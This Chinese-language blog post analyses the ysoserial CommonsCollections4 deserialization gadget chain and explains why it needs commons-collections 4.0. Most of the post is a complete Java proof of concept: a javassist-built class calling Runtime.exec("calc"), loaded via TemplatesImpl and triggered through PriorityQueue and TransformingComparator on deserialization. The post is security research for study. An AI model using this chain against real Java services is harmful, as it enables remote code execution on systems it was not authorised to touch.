ysoserial CommonsColletions4分析

其实CC4就是 CC3前半部分和CC2后半部分 拼接组成的,没有什么新的知识点。

不过要注意的是,CC4和CC2一样需要在commons-collections-4.0版本使用,3.1-3.2.1版本不能去使用,原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化。

JDK版本对于CC2和CC4来说,1.7和1.8都测试成功,下面我们就来快速构造一下payload

构造payload

CC4用的是javassist创建攻击类,使用TemplatesImpl类中的newTransformer方法触发攻击类中的静态方法

  1. public class Demo {
  2.     public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
  3.         Field field = obj.getClass().getDeclaredField(fieldName);
  4.         field.setAccessible(true);
  5.         field.set(obj, value);
  6.     }
  8.     public static void main(String[] args) throws Exception {
  9.         String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
  10.         //创建CommonsCollections2对象,父类为AbstractTranslet,注入了payload进构造函数
  11.         ClassPool classPool= ClassPool.getDefault();//返回默认的类池
  12.         classPool.appendClassPath(AbstractTranslet);//添加AbstractTranslet的搜索路径
  13.         CtClass payload=classPool.makeClass("CommonsCollections2");//创建一个新的public类
  14.         payload.setSuperclass(classPool.get(AbstractTranslet));  //设置CommonsCollections2类的父类为AbstractTranslet
  15.         payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");"); //创建一个static方法,并插入runtime
  16.         byte[] bytes=payload.toBytecode();//转换为byte数组
  18.         TemplatesImpl templatesImpl = new TemplatesImpl();
  19.         setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
  20.         setFieldValue(templatesImpl, "_name", "HelloTemplatesImpl");
  21.         setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());
  22.         templatesImpl.newTransformer();
  23.     }
  24. }

通过ConstantTransformer、InstantiateTransformer、ChainedTransformer三个类构造出一条调用链

  1.         Transformer[] transformers = new Transformer[]{
  2.             new ConstantTransformer(TrAXFilter.class),
  3.             new InstantiateTransformer(
  4.                 new Class[]{Templates.class},
  5.                 new Object[]{templatesImpl})
  6.         };
  7.         ChainedTransformer chain = new ChainedTransformer(transformers);

利用TransformingComparator触发chain#transform

  1.         TransformingComparator comparator = new TransformingComparator(chain);//使用TransformingComparator修饰器传入transformer对象

因为在优先级队列PriorityQueue反序列时候,满足条件即可调用到compare方法,所以利用这点来调用到TransformingComparator的compare

  1.         //创建PriorityQueue实例化对象,排序后使size值为2
  2.         PriorityQueue queue = new PriorityQueue(1);
  3.         queue.add(1);
  4.         queue.add(1);
  6.         Field field2 = queue.getClass().getDeclaredField("comparator");//获取PriorityQueue的comparator字段
  7.         field2.setAccessible(true);
  8.         field2.set(queue, comparator);//设置PriorityQueue的comparator字段值为comparator
  10.         Field field3 = queue.getClass().getDeclaredField("queue");//获取PriorityQueue的queue字段
  11.         field3.setAccessible(true);
  12.         field3.set(queue, new Object[]{templatesImpl, templatesImpl});//设置PriorityQueue的queue字段内容Object数组,内容为templatesImpl

最后几个注意点复习下:

size>= 2:对应queue.add调用两次

initialCapacity的值不能小于1:对应new PriorityQueue(1)

comparator的值要通过反射进行传入,不然会在序列化时候抛出异常

构造出的Payload:

  1. public class payload01 {
  2.     public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
  3.         Field field = obj.getClass().getDeclaredField(fieldName);
  4.         field.setAccessible(true);
  5.         field.set(obj, value);
  6.     }
  8.     public static void main(String[] args) throws Exception {
  9.         String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
  11.         //创建CommonsCollections2对象,父类为AbstractTranslet,注入了payload进构造函数
  12.         ClassPool classPool= ClassPool.getDefault();//返回默认的类池
  13.         classPool.appendClassPath(AbstractTranslet);//添加AbstractTranslet的搜索路径
  14.         CtClass payload=classPool.makeClass("CommonsCollections2");//创建一个新的public类
  15.         payload.setSuperclass(classPool.get(AbstractTranslet));  //设置CommonsCollections2类的父类为AbstractTranslet
  16.         payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");"); //创建一个static方法,并插入runtime
  17.         byte[] bytes=payload.toBytecode();//转换为byte数组
  19.         TemplatesImpl templatesImpl = new TemplatesImpl();
  20.         setFieldValue(templatesImpl, "_name", "xxxx");
  21.         setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
  23.         Transformer[] transformers = new Transformer[]{
  24.             new ConstantTransformer(TrAXFilter.class),
  25.             new InstantiateTransformer(
  26.                 new Class[]{Templates.class},
  27.                 new Object[]{templatesImpl})
  28.         };
  29.         ChainedTransformer chain = new ChainedTransformer(transformers);
  31.         TransformingComparator comparator = new TransformingComparator(chain);//使用TransformingComparator修饰器传入transformer对象
  33.         //创建PriorityQueue实例化对象,排序后使size值为2
  34.         PriorityQueue queue = new PriorityQueue(1);
  35.         queue.add(1);
  36.         queue.add(1);
  38.         Field field2 = queue.getClass().getDeclaredField("comparator");//获取PriorityQueue的comparator字段
  39.         field2.setAccessible(true);
  40.         field2.set(queue, comparator);//设置PriorityQueue的comparator字段值为comparator
  42.         Field field3 = queue.getClass().getDeclaredField("queue");//获取PriorityQueue的queue字段
  43.         field3.setAccessible(true);
  44.         field3.set(queue, new Object[]{templatesImpl, templatesImpl});//设置PriorityQueue的queue字段内容Object数组,内容为templatesImpl
  46.         ByteArrayOutputStream barr = new ByteArrayOutputStream();
  47.         ObjectOutputStream oos = new ObjectOutputStream(barr);
  48.         oos.writeObject(queue);
  49.         oos.close();
  51.         System.out.println(barr);
  52.         System.out.println(barr.toString());
  53.         ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
  54.         ois.readObject();
  55.     }
  56. }

ysoserial CommonsColletions4分析的更多相关文章

  1. ysoserial CommonsColletions2分析

    ysoserial CommonsColletions2分析 前言 此文章是ysoserial中 commons-collections2 的分析文章,所需的知识包括java反射,javassist. ...

  2. ysoserial CommonsColletions1分析

    JAVA安全审计 ysoserial CommonsColletions1分析 前言: 在ysoserial工具中,并没有使用TransformedMap的来触发ChainedTransformer链 ...

  3. ysoserial CommonsCollections2 分析

    在最后一步的实现上,cc2和cc3一样,最终都是通过TemplatesImpl恶意字节码文件动态加载方式实现反序列化. 已知的TemplatesImpl->newTransformer()是最终 ...

  4. ysoserial CommonsColletions7分析

    CC7也是一条比较通用的链了,不过对于其原理的话,其实还是挺复杂的.文章如有错误,敬请大佬们斧正 CC7利用的是hashtable#readObject作为反序列化入口.AbstractMap的equ ...

  5. ysoserial CommonsColletions3分析(2)

    上篇文章讲到CC3的TransformedMap链,这篇我们就来讲一下LazyMap链. 其实LazyMap链还是使用的TemplatesImpl承载payload,InstantiateTransf ...

  6. ysoserial CommonsColletions3分析(1)

    CC3的利用链在JDK8u71版本以后是无法使用的,具体还是由于AnnotationInvocationHandler的readobject进行了改写. 而CC3目前有两条主流的利用链,利用Trans ...

  7. ysoserial CommonsColletions6分析

    CC6的话是一条比较通用的链,在JAVA7和8版本都可以使用,而触发点也是通过LazyMap的get方法. TiedMapEntry#hashCode 在CC5中,通过的是TiedMapEntry的t ...

  8. ysoserial CommonsColletions5分析

    我们知道,AnnotationInvocationHandler类在JDK8u71版本以后,官方对readobject进行了改写. 所以要挖掘出一条能替代的类BadAttributeValueExpE ...

  9. ysoserial commonscollections6 分析

    利用链如下: 其中LazyMap.get()->ChainedTransformer.transform()-InvokerTransformer.transform()与CC1链一致. /* ...

随机推荐

  1. Python实现猜数字游戏

    Python中实现猜数字游戏代码如下: import random # 引入随机数标准库-random # 定义数字上下限和最大游戏次数 min_num = 1 max_num = 10 guess_ ...

  2. 针对Cloud-init的可行性报告

    by hyc 针对Cloud-init的可行性报告 一.Cloud-init研究进展: (1)ubuntu镜像: 已在版本为ubuntu-server-14.04-amd64上实现了修改主机名和用户密 ...

  3. Vue-Promise

    promise 就是一种异步编程的的解决方案 当执行网络请求的时候,代码就会出现阻塞,下面的代码要等待请求完成了在运行,所以我们一般网络请求的时候就去开启一个异步任务,一边请求一边执行其他代码 请求到 ...

  4. ACM学习笔记:可持久化线段树

    title : 可持久化线段树 date : 2021-8-18 tags : 数据结构,ACM 可持久化线段树 可以用来解决线段树存储历史状态的问题. 我们在进行单点修改后,线段树只有logn个(一 ...

  5. 常见web中间件漏洞(一)IIS漏洞

    web中间件作为web安全的重要一块,经常会有人问balabala,虽然有很多已经人尽皆知并且基本不再构成威胁了,但是还是有必要说一下,了解历史,了解我们从哪里来 鉴于内容实在是太多,本来打算一起写完 ...

  6. SpringBoot启动异常 Process finished with exit code 1

    记录一下一个报错 : < Springboot项目启动之后直接 Process finished with exit code 1 1. 是否有spring-boot-starter-web依赖 ...

  7. Django3使用WebSocket实现WebShell

    前言 最近工作中需要开发前端操作远程虚拟机的功能,简称WebShell. 基于当前的技术栈为react+django,调研了一会发现大部分的后端实现都是django+channels来实现websoc ...

  8. NOIP 模拟 $28\; \rm 割海成路之日$

    题解 \(by\;zj\varphi\) 用两个集合分别表示 \(1\) 边联通块,\(1,2\) 边联通块 . \(\rm son_x\) 表示当前节点通过 \(3\) 类边能到的 \(2\) 联通 ...

  9. sentinel安装

    sentinel介绍 随着微服务的流行,服务和服务之间的稳定性变得越来越重要.Sentinel 以流量为切入点,从流量控制.熔断降级.系统负载保护等多个维度保护服务的稳定性. Sentinel 具有以 ...

  10. c++本地动态连接库代码

    c++本地动态连接库代码 1 #pragma once 2 #include "stdafx.h" 3 4 #ifdef PERSON_EXPORTS 5 #define PERS ...